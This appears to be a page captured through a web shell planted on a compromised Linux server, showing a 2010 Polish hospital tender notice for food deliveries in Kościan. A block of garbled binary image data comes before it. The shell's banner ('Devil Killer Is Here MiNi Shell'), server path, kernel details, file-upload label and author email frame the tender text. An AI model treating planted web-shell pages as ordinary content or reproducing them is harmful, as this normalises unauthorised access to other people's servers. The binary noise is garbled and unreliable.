JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100621/176058-N-2010.html

<p class="kh_header"><b>Kościan: dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 176058 - 2010; data zamieszczenia: 21.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Neuropsychiatryczny im. Oskara Bielawskiego , pl. Paderewskiego 1a, 64-000 Kościan, woj. wielkopolskie, tel. 065 5115100, faks 065 5122296.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsn.koscian.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa artykułów spożywczych do magazynu żywnościowego Szpitala, podzielonych na 4 zadania, tj.:
Zadanie 1 - mięso świeże;
Zadanie 2 - przetwory drobiowe
Zadanie 3 - produkty przemiału ziarna
Zadanie 4 - wędliny;
zgodnie z opisem stanowiącym załącznik nr 2a-2d do specyfikacji istotnych warunków zamówienia.
2. Dostawa transportem wykonawcy z częstotliwością odpowiadającą terminom podanym w załączniku 2a-2d.
UWAGA: W okresie letnim (lipiec, sierpień) dodatkowo dowóz towaru  do Ośrodka Wczasowego w Cichowie gm. Krzywiń z częstotliwością jak w załączniku 2a-2d.
3. Do każdej dostawy z zadania 1,2,4 wymagany jest Handlowy Dokument Identyfikacyjny (HDI). 
4. Dostawy mają odbywać się w dniach i godzinach podanych w załączniku 2a-2d..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.61.00.00-7, 15.13.15.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania wiedzy i doświadczenia został spełniony, jeżeli   
        Wykonawca  wykaże, że w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest 
        krótszy - w tym okresie, zrealizowali lub realizują co najmniej 2 dostawy o charakterze   
        odpowiadającym przedmiotowi zamówienia, tj.: 
        dla zadania 1 dostawy świeżego mięsa o łącznej wartości minimum 100.000 zł.
          dla zadania 2 dostawy przetworów drobiowych o łącznej wartości minimum 2.000 zł.
          dla zadania 3 dostawy produktów przemiału ziarna o łącznej wartości minimum 10.000 zł.
          dla zadania 4 dostawy wędlin o łącznej wartości minimum 100.000 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.1	Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony jeżeli Wykonawca wykaże, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za dostawy artykułów żywnościowych wraz z informacjami w zakresie ich doświadczenia i wykształcenia o także zakresu wykonywanych przez nich czynności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.1	Zamawiający uzna warunek w zakresie sytuacji ekonomicznej i finansowej za spełniony, jeżeli  
        Wykonawca wykaże, że posiada zdolność kredytową na kwotę 100.000zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Sprzedawca gwarantuje, że opłaty miesięczne dotyczące dostawy towaru nie ulegną zmianie przez      
      pierwszy rok trwania umowy. W latach następnych ceny mogą ulec zmianie o współczynnik 
      inflacji podany przez GUS za poprzedni rok gospodarczy (kalendarzowy) po uprzedniej negocjacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wsn.koscian.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy forma pisemna: w siedzibie zamawiającego (Wojewódzki Szpital Neuropsychiatryczny w Kościanie, pl. Paderewskiego 1A, dział eksploatacyjno-techniczny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2010 godzina 10:00, miejsce: Wojewódzki Szpital Neuropsychiatryczny w Kościanie, pl. Paderewskiego 1A.Oferty należy składać w Działe Eksploatacyjno-Technicznym  - biuro st. inspektora ds. zamówień publicznych..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> mięso świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Karkówka wieprz. bez kości - świeża	2500 
Łopatka wieprzowa bez skóry, bez tłuszczu, z  kością - świeża	16000 
Schab wieprzowy bez kości -  świeży	3000
Serca wieprzowe -świeże	2000
Szynka wieprzowa bez tłuszczu, bez skóry , bez kości - świeża	2100
Wątroba wieprzowa -świeża	2500
Żeberka wieprzowe długie paski  - świeże	2400
Zamówienie obejmuje dostawy wg asortymentu, dostawa odpowiednim transportem wykonawcy  dwa razy w tygodniu (wtorek, czwartek) w godzinach od 8.00 do 11.00. 
W miesiącach letnich (lipiec, sierpień)dodatkowo dowóz do Ośrodka Wczasowego w Cichowie, gm Krzywiń  dwa razy w tygodniu (wtorek, czwartek) w godzinach od 9.30 do 10.30.

Każda partia dostarczonego towaru musi posiadać świadectwo jakości towaru oraz dokument HDI

Dostawa towaru od 01.09.2010r. do 30-06-2013r.


UWAGA !
Suma wartości brutto = cena brutto w formularzu ofertowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> przetwory drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pasztet drobiowy smakowy z dodatkami 0,160 g	35000 szt.Opis przedmiotu zamówienia:

Zamówienie obejmuje dostawy wg asortymentu, dostawa odpowiednim transportem wykonawcy  dwa razy w tygodniu (wtorek, czwartek) w godzinach od 8.00 do 9.00. 
W miesiącach letnich (lipiec, sierpień)dodatkowo dowóz do Ośrodka Wczasowego w Cichowie, gm Krzywiń  dwa razy w tygodniu (wtorek, czwartek) w godzinach od 9.30 do 10.30.

Każda partia dostarczonego towaru musi posiadać świadectwo jakości towaru oraz dokument HDI.

Dostawa towaru na okres od podpisania umowy do 30-06-2013 r.


UWAGA !
Suma wartości brutto = cena brutto w formularzu ofertowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> produkty przemiału ziarna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kasza manna a 1kg	2300 kg
Kasza jęczmienna a 1kg	3200 kg
Kasza jęcz.  (kartonik) a 0,4 kg	120 szt
Mąka pszenna a 1kg typu 500	14000 kg
Mąka niskobiałkowa a 0,5 kg	20 kg 
Mąka ziemniaczana a 1kg	150 kg
Płatki owsiane a 0,5 kg	1400 kg
Ryż biały łamany a 1kg	6000 kg
Kaszka kukurydziana a 0,5 kg	    50 kg
Ryż biały ( kartonik) a 0,4 kg	120 szt.
Mąka kukurydziana a 0,5 kg 	20 kg
Opis przedmiotu zamówienia:

Zamówienie obejmuje dostawy wg asortymentu, dostawa transportem wykonawcy  jeden raz w tygodniu w godzinach od 8.00 do 11.00. W miesiącach letnich (lipiec, sierpień)
dodatkowo dowóz do Ośrodka Wczasowego w Cichowie, gm Krzywiń  jeden raz na 2 tygodnie. 

Dostawa towaru na okres od podpisania umowy do 30-06-2013 r.



UWAGA !
Suma wartości brutto = cena brutto w formularzu ofertowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kiełbasa biała parzona	350 kg
Boczek wędzony surowy	600 kg
Kabanosy wieprzowe wędzone	80 kg
Kaszanka w bloku do smażenia	1800 kg
Łopatka konserwowa	2500 kg
Kiełbasa typu Madrycka, Śląska	2800 kg
Metka łososiowa	  800 kg
Metka cebulowa 	  800 kg
Parówka gruba (naturalny flak, 1 szt. 100g)	3600 kg
Parówka cienka -1 szt. 80g 	3600 kg
Pasztetowa w naturalnym flaku, typu wątrobianka	2500 kg
Pieczeń wieprzowa ( 1 szt. do 0,5 kg)	1600 kg
Polędwica chłopska 	1200 kg
Salceson ozorowy	1200 kg
Salceson biały	1200 kg
Kiełbasa typu senatorska lub zielonogórska	2200 kg
Szynka gotowana wieprzowa	1200 kg
Kiełbasa typu szynkowa	3000 kg
Wędlina drobiowa	2400 kg
Kiełbasa typu wiejska do smażenia	2400 kg
Żołądki wieprzowe	1800 kg
Zamówienie obejmuje dostawy wg asortymentu, dostawa odpowiednim transportem wykonawcy  dwa razy w tygodniu (wtorek, czwartek) w godzinach od 8.00 do 11.00. 
W miesiącach letnich (lipiec, sierpień)dodatkowo dowóz do Ośrodka Wczasowego w Cichowie, gm Krzywiń  dwa razy w tygodniu (wtorek, czwartek) w godzinach od 9.30 do 10.30.

Każda partia dostarczonego towaru musi posiadać świadectwo jakości towaru oraz dokument HDI

Dostawa towaru od 01.09.2010r. do 30-06-2013r.
UWAGA !
Suma wartości brutto = cena brutto w formularzu ofertowy.


1. Kiełbasa biała - parzona. Mięso wieprz. w 85% w osłonkach naturalnych. 1 szt. 100g. Smak i zapach charakterystyczny dla danego asortymentu z wyczuciem przypraw.

2. Boczek wędzony surowy - wieprzowy bez żeberek i bez skóry. Powierzchnia wyrobu sucha.

3. Kabanosy wieprzowe- wędzone  - lekko podsuszone, w osłonie białkowej, barwa charakterystyczna dla danego asortymentu. Wyczuwalny smak przypraw.

4. Kaszanka w bloku do smażenia - z domieszką kaszy jęczmiennej. Osłonka sztuczna, produkt blokowy do 2 kg szt. Smak i zapach charakterystyczny dla wędliny podrobiowej, umiarkowanie słony, wyczuwalne przyprawy majeranku, pieprzu nat. Zawartość tłuszczu 40% - 50%.

5. Łopatka konserwowa - wieprzowa, grubo rozdrobniona w osłonie sztucznej. Wyczuwalny smak i zapach użytych przypraw. Łatwa w plastrowaniu.

6. Kiełbasa typu Madrycka, Śląska - wieprzowa, średnio rozdrobniona, lekko wędzona. W osłonkach naturalnych o średnicy 35 mm. Zawartość tłuszczu do 35%

7. Metka łososiowa - drobno rozdrobniona, w osłonce białkowej sztucznej, lekko wędzona smarowna. Smak i zapach charakterystyczny dla danego asortymentu. Wyczuwalne przyprawy. Zawartość tłuszczu do 40%.  

8. Metka cebulowa - drobno rozdrobniona , w osłonce białkowej sztucznej, lekko wędzona smarowna. Smak i zapach charakterystyczny dla danego asortymentu. Wyczuwalne przyprawy. Zawartość tłuszczu do 40%.

9. Parówka gruba- porcyjna do 100g -1szt. wieprzowa, przyprawy naturalne, lekko wędzona, parzona. Osłonka naturalna. Barwa jasnoróżowa. Po podgrzaniu soczysta. Zawartość tłuszczu  do 40%.

10. Parówka cienka - 1 szt. 80g wieprzowa. Przyprawy naturalne. Osłonka sztuczna lub naturalna. Drobno rozdrobniona, lekko wędzona. Parzona, gładkiej powierzchni. Po zgrzaniu soczysta. Zawartość tłuszczu do 40%.

11. Pasztetowa w naturalnym flaku - typu wątrobianka, lekko wędzona, smarowna bez widocznego tłuszczu, porcyjna, bez końcówek. W składzie mięso z głów wieprzowych, skórki wieprzowe, wątroba wieprzowa. Tłuszcz do 40%.
12. Pieczeń wieprzowa - peklowana, widoczne przyprawy na powierzchni wyrobu. Łatwa w plastrowaniu. 1 szt. do 0,5 kg.  Osłonka sztuczna.

13. Polędwica chłopska - wieprzowa, drobno rozdrobniona. Barwa jasnoróżowa. Łatwa w plastrowaniu. Zawartość tłuszczu do 15 %.


14. Salceson ozorowy - wyrób w osłonce sztucznej lub naturalnej, widoczny skład ozorów. Łatwy w plastrowaniu. Niedopuszczalne skupisko niewymieszanych składników. Zapach świeży.

15. Salceson biały - wyrób w osłonce sztucznej lub naturalnej. Niedopuszczalne skupisko niewymieszanych składników. Zapach świeży. Łatwy w plastrowaniu.

16. Kiełbasa typu senatorska lub zielonogórska -  grubo rozdrobniona, wieprzowa, w osłonce sztucznej. Barwa charakterystyczna dla danego asortymentu. Łatwa w plastrowaniu.

17. Szynka gotowana wieprzowa - osłonka lub siatka formująca. Konsystencja soczysta, krucha, lekko wilgotna. Cechy charakterystyczne szynki wieprzowej. Łatwa w pilastrowaniu.

18. Kiełbasa typu szynkowa - wieprzowa chuda, bez widocznych oczek tłuszczu, grubo rozdrobniona, lekko wędzona, parzona. W składzie 85% mięsa wieprzowego I klasy. Kiełbasa w osłonkach sztucznych. Konsystencja ścisła. Zawartość tłuszczu do 10%. Łatwa w plastrowaniu.

19. Wędlina drobiowa - z mięsa drobiowego, drobno rozdrobniona w osłonce sztucznej. Barwa jasnoróżowa. Zawartość tłuszczu do 15%. Łatwa w plastrowaniu.

20. Kiełbasa typu wiejska - kiełbasa z wieprzowiny nadająca się do smażenia, w osłonce naturalnej, lekko podsuszana. Wyczuwalny smak i zapach użytych przypraw. Zawartość tłuszczu do 40%.

21. Żołądki wieprzowe - parzone, oczyszczone, świeże. Niedopuszczalny obcy zapach świadczący o nieświeżości. Jednorazowo zapotrzebowanie do 100kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com